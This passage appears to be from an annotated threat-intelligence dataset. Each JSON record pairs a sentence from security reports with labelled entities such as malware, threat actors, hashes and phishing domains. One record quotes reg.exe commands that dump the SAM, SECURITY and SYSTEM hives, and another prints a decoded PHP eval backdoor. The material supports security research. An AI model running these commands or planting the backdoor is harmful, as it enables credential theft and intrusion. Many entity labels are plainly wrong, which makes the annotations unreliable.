glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN.","entities":[{"id":44711,"label":"identity","start_offset":0,"end_offset":10},{"id":44712,"label":"vulnerability","start_offset":113,"end_offset":137},{"id":44713,"label":"tools","start_offset":167,"end_offset":170},{"id":44714,"label":"attack-pattern","start_offset":60,"end_offset":82}],"relations":[{"id":18,"from_id":44714,"to_id":44712,"type":"exploits"}],"Comments":[]} +{"id":1010,"text":"Accounts for big universities (e.g., MIT, Stanford, etc.) are mainly used to access respective library services and resources, \"including research help, study spaces, print and electronic books\/journals and more.\"","entities":[{"id":46511,"label":"identity","start_offset":42,"end_offset":50},{"id":46510,"label":"identity","start_offset":37,"end_offset":40}],"relations":[],"Comments":[]} +{"id":511,"text":"Figure 1 shows the proportion of ransomware sample numbers for different families that Unit 42 detected in the wild.","entities":[{"id":46142,"label":"identity","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} +{"id":2845,"text":" The WanaCrypt0r ransomware spreads itself by heavily scanning over TCP port 445 (associated with SMB) and attempting to exploit the ETERNALBLUE vulnerability on systems.","entities":[{"id":48049,"label":"malware","start_offset":5,"end_offset":16},{"id":8683,"label":"vulnerability","start_offset":133,"end_offset":144}],"relations":[{"id":381,"from_id":48049,"to_id":8683,"type":"exploits"}],"Comments":[]} +{"id":12585,"text":"The payload seems to be a product of extensive software engineering.","entities":[],"relations":[],"Comments":[]} +{"id":2052,"text":"Many of these also use the x4k name in the domain.","entities":[{"id":45235,"label":"threat-actor","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} +{"id":4141,"text":"The group dumps credentials stored in registries by using reg.exe: reg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit reg.exe save hklm\\security c:\\windows\\temp\\se.dit reg.exe save hklm\\system c:\\windows\\temp\\sy.dit","entities":[{"id":49940,"label":"FILEPATH","start_offset":146,"end_offset":168},{"id":49941,"label":"FILEPATH","start_offset":169,"end_offset":176},{"id":49944,"label":"FILEPATH","start_offset":219,"end_offset":226},{"id":49947,"label":"FILEPATH","start_offset":67,"end_offset":74},{"id":49939,"label":"REGISTRYKEY","start_offset":137,"end_offset":145},{"id":49942,"label":"REGISTRYKEY","start_offset":182,"end_offset":195},{"id":49943,"label":"FILEPATH","start_offset":196,"end_offset":218},{"id":49945,"label":"REGISTRYKEY","start_offset":232,"end_offset":243},{"id":49946,"label":"FILEPATH","start_offset":244,"end_offset":266},{"id":49948,"label":"REGISTRYKEY","start_offset":80,"end_offset":88},{"id":49949,"label":"FILEPATH","start_offset":89,"end_offset":123},{"id":49950,"label":"FILEPATH","start_offset":124,"end_offset":131}],"relations":[],"Comments":[]} +{"id":7164,"text":"Updated June 18, 2018, 10:05 AM to add new IoC information from IssueMakersLab's July investigation.","entities":[{"id":22406,"label":"TIME","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} +{"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} +{"id":4986,"text":"More technical details about this vulnerability are available in this RCA by Maddie Stone.","entities":[{"id":51045,"label":"identity","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} +{"id":1651,"text":"Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":3194,"text":"The fake Adobe Flash Player download page of the watering hole attack Figure 5.","entities":[{"id":48321,"label":"attack-pattern","start_offset":49,"end_offset":69},{"id":48320,"label":"SOFTWARE","start_offset":9,"end_offset":27}],"relations":[],"Comments":[]} +{"id":1294,"text":" The malware then attempts to read the following file.","entities":[],"relations":[],"Comments":[]} +{"id":4943,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":50967,"label":"threat-actor","start_offset":43,"end_offset":48},{"id":50968,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} +{"id":12299,"text":"We terminated 2 YouTube channels as part of our ongoing investigation into a coordinated influence operation linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} +{"id":7113,"text":"The Iron Tiger APT group has used the HyperBro malware family since at least 2017.","entities":[{"id":22266,"label":"malware","start_offset":38,"end_offset":46}],"relations":[],"Comments":[]} +{"id":12087,"text":"Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":37425,"label":"attack-pattern","start_offset":0,"end_offset":8},{"id":37426,"label":"location","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} +{"id":14394,"text":"XDR is intended to be that security data lake of deeper enterprise infrastructure and security information than we\u2019ve previously gathered in a single addressable pool and designed to be useful for threat hunters and analysts.","entities":[{"id":51776,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":2865,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":455,"text":"Fortunately, there are emerging technologies now that can better counter DGAs.","entities":[],"relations":[],"Comments":[]} +{"id":2604,"text":"In other cases, for example that of Microsoft, there was simply publication without extortion, again supporting the understanding that the primary motivation of this actor is notoriety rather than financial gain.","entities":[{"id":45615,"label":"identity","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} +{"id":13447,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":41867,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} +{"id":10247,"text":"In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers.","entities":[{"id":31314,"label":"attack-pattern","start_offset":51,"end_offset":62},{"id":31315,"label":"malware","start_offset":109,"end_offset":112},{"id":31316,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} +{"id":12437,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":38657,"label":"location","start_offset":0,"end_offset":4},{"id":38658,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":38659,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":38660,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} +{"id":3131,"text":"If you\u2019re not sure how to do this, contact your Internet Service Provider (ISP) that gave you the router for help.","entities":[],"relations":[],"Comments":[]} +{"id":13591,"text":"First, the $IDFX variable uses XOR operation (see character ^) to decode the string \u201ccreate_function\u201d, then the resulting base64 string is decoded to @eval($_REQUEST['ec_ver2update']); which is the backdoor\u2019s code.","entities":[],"relations":[],"Comments":[]} +{"id":5551,"text":"However, as we\u2019ve seen, Magecart has hit big-name brands as well as less well-known companies.","entities":[{"id":51540,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} +{"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} +{"id":14296,"text":"Maikspy on the Windows platform Figure 7.","entities":[{"id":48501,"label":"malware","start_offset":0,"end_offset":8},{"id":48502,"label":"SOFTWARE","start_offset":15,"end_offset":23}],"relations":[{"id":433,"from_id":48501,"to_id":48502,"type":"targets"}],"Comments":[]} +{"id":3953,"text":"In addition, a publicly available JoeWare domain tool called LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.","entities":[{"id":49805,"label":"FILEPATH","start_offset":61,"end_offset":67},{"id":49806,"label":"tools","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} +{"id":1848,"text":" Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).","entities":[],"relations":[],"Comments":[]} +{"id":9636,"text":"theme0.xml is extracted to \/tmp\/system\/word\/theme\/syslogd before it\u2019s executed.","entities":[],"relations":[],"Comments":[]} +{"id":10617,"text":"In the simple phishing example below, an attacker has sent a phishing email with a security alert lure from \u201cGoolge\u201d suggesting the user secure their account.","entities":[{"id":32385,"label":"attack-pattern","start_offset":14,"end_offset":22},{"id":32386,"label":"attack-pattern","start_offset":61,"end_offset":69},{"id":32387,"label":"location","start_offset":83,"end_offset":91},{"id":32388,"label":"location","start_offset":92,"end_offset":97},{"id":32389,"label":"location","start_offset":98,"end_offset":102}],"relations":[],"Comments":[]} +{"id":210,"text":" Further analysis has confirmed that the malware accepts command-line arguments allowing an attacker to instruct the malware to sleep for a period of time or to shut down the system.","entities":[],"relations":[],"Comments":[]} +{"id":6959,"text":"ObliqueRat attack chain ","entities":[{"id":21788,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} +{"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} +{"id":1631,"text":" Each of these applications is designed to appear like a legitimate application already in the app store.","entities":[],"relations":[],"Comments":[]} +{"id":10409,"text":"Further research uncovered other dropped files involved in this attack.","entities":[],"relations":[],"Comments":[]} +{"id":8191,"text":"A perceptive employee could potentially identify this as something unusual, which raises red flags.","entities":[],"relations":[],"Comments":[]} +{"id":50,"text":"Put another way, the ransomware model represented both increased efficiency and decreased risk in monetizing the infection.","entities":[],"relations":[],"Comments":[]} +{"id":2927,"text":"The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs.","entities":[{"id":48098,"label":"tools","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} +{"id":2816,"text":" Reports quickly emerged that this attack was effective due to the presence of code exploiting a vulnerability (CVE-2017-0144) in Microsoft Windows (code named: ETERNALBLUE) that was released as part of the Equation Group dump by the Shadow Brokers in their fifth leak on April 14, 2017.","entities":[{"id":48034,"label":"SOFTWARE","start_offset":130,"end_offset":147},{"id":48035,"label":"TIME","start_offset":272,"end_offset":286},{"id":48033,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":8600,"label":"vulnerability","start_offset":161,"end_offset":172},{"id":8601,"label":"threat-actor","start_offset":207,"end_offset":221},{"id":8602,"label":"threat-actor","start_offset":230,"end_offset":248}],"relations":[{"id":377,"from_id":48034,"to_id":48033,"type":"has"},{"id":378,"from_id":8600,"to_id":48033,"type":"related-to"},{"id":379,"from_id":8600,"to_id":8601,"type":"related-to"}],"Comments":[]} +{"id":9052,"text":"RATANKBA main console interface","entities":[{"id":27959,"label":"tools","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":2279,"text":"These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads.","entities":[{"id":47349,"label":"DOMAIN","start_offset":90,"end_offset":101},{"id":47350,"label":"SOFTWARE","start_offset":266,"end_offset":276}],"relations":[],"Comments":[]} +{"id":5802,"text":"And cyberspace is just one of them now, but we're getting into this unique area which we anticipated\u2026could cyber conflict be the main domain that is being acted upon?","entities":[{"id":17948,"label":"location","start_offset":0,"end_offset":3},{"id":17949,"label":"identity","start_offset":18,"end_offset":22},{"id":17951,"label":"location","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} +{"id":2489,"text":"Since exploitation is straightforward and all the relevant technical details have already gone viral on the internet, it\u2019s possible that SpringShell will become fully weaponized and abused on a larger scale.","entities":[{"id":47572,"label":"vulnerability","start_offset":137,"end_offset":148}],"relations":[],"Comments":[]} +{"id":10091,"text":"Supernova, one of the malicious components associated with the attack, is a .NET web shell backdoor that presents itself as a legitimate SolarWinds web service handler.","entities":[{"id":30777,"label":"tools","start_offset":0,"end_offset":9},{"id":30778,"label":"location","start_offset":11,"end_offset":14},{"id":30779,"label":"attack-pattern","start_offset":81,"end_offset":90},{"id":30780,"label":"identity","start_offset":137,"end_offset":147},{"id":30781,"label":"attack-pattern","start_offset":148,"end_offset":159}],"relations":[],"Comments":[]} +{"id":2198,"text":"This check exists in a number of the subsequent processes\/executables used by the TDrop2 malware variant.","entities":[{"id":6600,"label":"malware","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} +{"id":258,"text":"For example, we detected a website that was distributing a malicious binary by masquerading as a popular global communication app targeting users in Ukraine.","entities":[{"id":847,"label":"attack-pattern","start_offset":79,"end_offset":91},{"id":44662,"label":"location","start_offset":149,"end_offset":156},{"id":44663,"label":"attack-pattern","start_offset":44,"end_offset":75}],"relations":[],"Comments":[]} +{"id":5118,"text":"[00:59] It makes for interesting cinema, just like the red code\/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.","entities":[],"relations":[],"Comments":[]} +{"id":4122,"text":"Checks environment information 0x500E Unknown","entities":[],"relations":[],"Comments":[]} +{"id":8149,"text":"In addition, a URL linking to one of the apps\u2019 Google Play pages is also found on one of the C&C servers.","entities":[],"relations":[],"Comments":[]} +{"id":12619,"text":"Before it encrypts any file, the ransomware also performs certain preparatory routines.","entities":[],"relations":[],"Comments":[]} +{"id":3321,"text":"These database files are used for saving the chat history.","entities":[],"relations":[],"Comments":[]} +{"id":2200,"text":"Once extracted, the file writes it to a new file on disk prior to executing it.","entities":[],"relations":[],"Comments":[]} +{"id":3973,"text":"A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.","entities":[],"relations":[],"Comments":[]} +{"id":12086,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf ","entities":[{"id":37413,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":37414,"label":"attack-pattern","start_offset":22,"end_offset":30},{"id":37415,"label":"location","start_offset":31,"end_offset":39},{"id":37416,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":37417,"label":"URL","start_offset":229,"end_offset":255},{"id":37418,"label":"location","start_offset":256,"end_offset":260},{"id":37419,"label":"URL","start_offset":292,"end_offset":318},{"id":37420,"label":"location","start_offset":319,"end_offset":323},{"id":37421,"label":"URL","start_offset":340,"end_offset":366},{"id":37422,"label":"location","start_offset":367,"end_offset":371},{"id":37423,"label":"malware","start_offset":410,"end_offset":417},{"id":37424,"label":"URL","start_offset":430,"end_offset":455}],"relations":[],"Comments":[]} +{"id":468,"text":"In this environment blocking and taking down DGA-related domains quickly becomes a game of \u201cwhack a mole\u201d that is sometimes futile.","entities":[],"relations":[],"Comments":[]} +{"id":1889,"text":"In our previous entry, we already covered the Delphi component in the context of the Confucius and Patchwork connection.","entities":[{"id":47022,"label":"threat-actor","start_offset":85,"end_offset":94},{"id":47023,"label":"threat-actor","start_offset":99,"end_offset":108}],"relations":[],"Comments":[]} +{"id":7369,"text":"The script then waits 20 minutes before it runs the wrapper script initall: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a initall Figure 2.","entities":[{"id":22893,"label":"location","start_offset":16,"end_offset":21},{"id":22894,"label":"TIME","start_offset":22,"end_offset":32},{"id":22895,"label":"SHA2","start_offset":76,"end_offset":140}],"relations":[],"Comments":[]} {"id":8563,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} -{"id":8564,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":26462,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":26463,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} -{"id":8565,"text":"APT35 has relied on this technique since 2017 — targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":26465,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":26467,"label":"location","start_offset":93,"end_offset":101},{"id":26469,"label":"location","start_offset":137,"end_offset":140},{"id":26470,"label":"location","start_offset":141,"end_offset":149},{"id":26471,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} -{"id":8566,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.","entities":[{"id":26472,"label":"attack-pattern","start_offset":11,"end_offset":19},{"id":26473,"label":"location","start_offset":79,"end_offset":83}],"relations":[],"Comments":[]} -{"id":8567,"text":"In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.","entities":[],"relations":[],"Comments":[]} -{"id":8570,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":26484,"label":"location","start_offset":45,"end_offset":48},{"id":26485,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} -{"id":8571,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":26488,"label":"location","start_offset":11,"end_offset":15},{"id":26490,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} -{"id":8573,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":26496,"label":"location","start_offset":30,"end_offset":34},{"id":26497,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} -{"id":8574,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[{"id":26499,"label":"location","start_offset":71,"end_offset":78},{"id":26500,"label":"attack-pattern","start_offset":84,"end_offset":92}],"relations":[],"Comments":[]} -{"id":8578,"text":"One of APT35’s novel techniques involves using Telegram for operator notifications.","entities":[],"relations":[],"Comments":[]} -{"id":8579,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[{"id":26517,"label":"attack-pattern","start_offset":36,"end_offset":44},{"id":26518,"label":"location","start_offset":63,"end_offset":67},{"id":26519,"label":"location","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} -{"id":8581,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[{"id":26523,"label":"location","start_offset":83,"end_offset":86},{"id":26524,"label":"location","start_offset":126,"end_offset":129},{"id":26525,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":26526,"label":"location","start_offset":168,"end_offset":173},{"id":26527,"label":"location","start_offset":177,"end_offset":181},{"id":26528,"label":"location","start_offset":182,"end_offset":186}],"relations":[],"Comments":[]} -{"id":8583,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":26532,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":26533,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} -{"id":8590,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[],"relations":[],"Comments":[]} -{"id":8592,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf ","entities":[{"id":26561,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":26562,"label":"attack-pattern","start_offset":22,"end_offset":30},{"id":26563,"label":"location","start_offset":31,"end_offset":39},{"id":26564,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":26565,"label":"URL","start_offset":229,"end_offset":255},{"id":26566,"label":"location","start_offset":256,"end_offset":260},{"id":26567,"label":"URL","start_offset":292,"end_offset":318},{"id":26568,"label":"location","start_offset":319,"end_offset":323},{"id":26569,"label":"URL","start_offset":340,"end_offset":366},{"id":26570,"label":"location","start_offset":367,"end_offset":371},{"id":26571,"label":"malware","start_offset":410,"end_offset":417},{"id":26572,"label":"URL","start_offset":430,"end_offset":455}],"relations":[],"Comments":[]} -{"id":8593,"text":"Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":26573,"label":"attack-pattern","start_offset":0,"end_offset":8},{"id":26574,"label":"location","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} -{"id":8594,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[],"relations":[],"Comments":[]} -{"id":8596,"text":"Understanding the techniques used by attackers helps us counter these threats effectively.","entities":[],"relations":[],"Comments":[]} -{"id":8601,"text":"We believe this is a technique the attacker is using to evade detection rules.","entities":[],"relations":[],"Comments":[]} -{"id":8602,"text":"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.","entities":[],"relations":[],"Comments":[]} -{"id":8607,"text":"Since mid-August, OpenSUpdater samples have carried an invalid signature, and further investigation showed this was a deliberate attempt to evade detection.","entities":[{"id":26605,"label":"malware","start_offset":18,"end_offset":30},{"id":26606,"label":"location","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} -{"id":8610,"text":"Bytes: 30 0D 06 09 2A 86 48 86 F7 0D 01 01 0B 00 00","entities":[],"relations":[],"Comments":[]} -{"id":8614,"text":"As shown in the following screenshot, the signature is considered to be valid by the Windows operating system.","entities":[],"relations":[],"Comments":[]} -{"id":8616,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":26618,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} -{"id":8617,"text":"The following are samples using this evasion: https:\/\/www.virustotal.com\/gui\/file\/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f\/detection","entities":[{"id":26619,"label":"location","start_offset":14,"end_offset":17},{"id":26620,"label":"SHA1","start_offset":46,"end_offset":156}],"relations":[],"Comments":[]} -{"id":8618,"text":"New variant: https:\/\/www.virustotal.com\/gui\/file\/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db\/detection","entities":[{"id":26621,"label":"URL","start_offset":13,"end_offset":123}],"relations":[],"Comments":[]} -{"id":8625,"text":"The four exploits were used as a part of three different campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":8635,"text":"The links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.","entities":[],"relations":[],"Comments":[]} -{"id":8637,"text":"The information collected from the fingerprinting phase included screen resolution, timezone, languages, browser plugins, and available MIME types.","entities":[{"id":26687,"label":"attack-pattern","start_offset":35,"end_offset":49},{"id":26688,"label":"location","start_offset":122,"end_offset":125}],"relations":[],"Comments":[]} +{"id":1875,"text":" (SC) StartService FAILED 1275: This driver has been blocked from loading","entities":[],"relations":[],"Comments":[]} +{"id":1972,"text":"In fact, a 32 byte length is always read, which could lead to a buffer out-of-bounds condition.","entities":[],"relations":[],"Comments":[]} +{"id":4699,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google\u2019s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google\u2019s efforts to protect users from commercial spyware.","entities":[{"id":50584,"label":"identity","start_offset":83,"end_offset":96},{"id":50585,"label":"TIME","start_offset":157,"end_offset":170},{"id":50587,"label":"identity","start_offset":324,"end_offset":330},{"id":50583,"label":"identity","start_offset":46,"end_offset":79},{"id":50586,"label":"identity","start_offset":173,"end_offset":188},{"id":50588,"label":"identity","start_offset":98,"end_offset":153}],"relations":[],"Comments":[]} +{"id":3595,"text":"Note that this does not cover all the samples \u2013 it is possible that other payloads are being deployed as well.","entities":[],"relations":[],"Comments":[]} +{"id":3187,"text":"We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.","entities":[{"id":48314,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} +{"id":1478,"text":"The developer is aware of this concern and plans to encourage more of its customers to sign their own applications in the coming year.","entities":[],"relations":[],"Comments":[]} +{"id":1421,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":115,"text":"A challenge many organizations face is that the cloud isn\u2019t simple, and many of the technologies that make up the cloud are new, with new features being deployed all the time.","entities":[],"relations":[],"Comments":[]} +{"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} +{"id":12193,"text":"JuneWe terminated 33 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} +{"id":491,"text":"Users will interact with the window, thinking they are performing their intended function, but they are actually engaging with the attackers overlay window and executing the attacker\u2019s desired function.","entities":[],"relations":[],"Comments":[]} +{"id":1524,"text":" Currently these IP addresses are alive and active.","entities":[],"relations":[],"Comments":[]} +{"id":2690,"text":"Note: This is not an all-inclusive list of the protections provided by Palo Alto Networks.","entities":[{"id":8237,"label":"identity","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} +{"id":2570,"text":" This underscores why credential theft is something that organizations should prioritize as a top threat and take steps to understand it and prevent it.","entities":[{"id":47767,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} +{"id":1196,"text":"The reason is because most SMS-based IAP SDKs include comprehensive functionalities to monitor, manage, and even intercept a user\u2019s SMS communication silently in the background, without any user interaction or knowledge.","entities":[],"relations":[],"Comments":[]} +{"id":4061,"text":"The capability of ChiserClient is shown in the following table: Command code Function 0x10001","entities":[{"id":12290,"label":"malware","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} +{"id":1202,"text":"According to JoloPlay\u2019s website, these 17 games have been downloaded and installed more than 1.7 million times.","entities":[{"id":46593,"label":"SOFTWARE","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} +{"id":10722,"text":"The specificity of their targets stems from the social engineering tactics used.","entities":[],"relations":[],"Comments":[]} +{"id":876,"text":"analysis sample PClock2 is written in Visual Basic.","entities":[{"id":46410,"label":"SOFTWARE","start_offset":39,"end_offset":51},{"id":44898,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":188,"from_id":44898,"to_id":46410,"type":"uses"}],"Comments":[]} +{"id":5399,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} +{"id":7789,"text":"log","entities":[],"relations":[],"Comments":[]} +{"id":3189,"text":"It conducts this identification by testing whether the port is open or not and then by checking the response. Figure 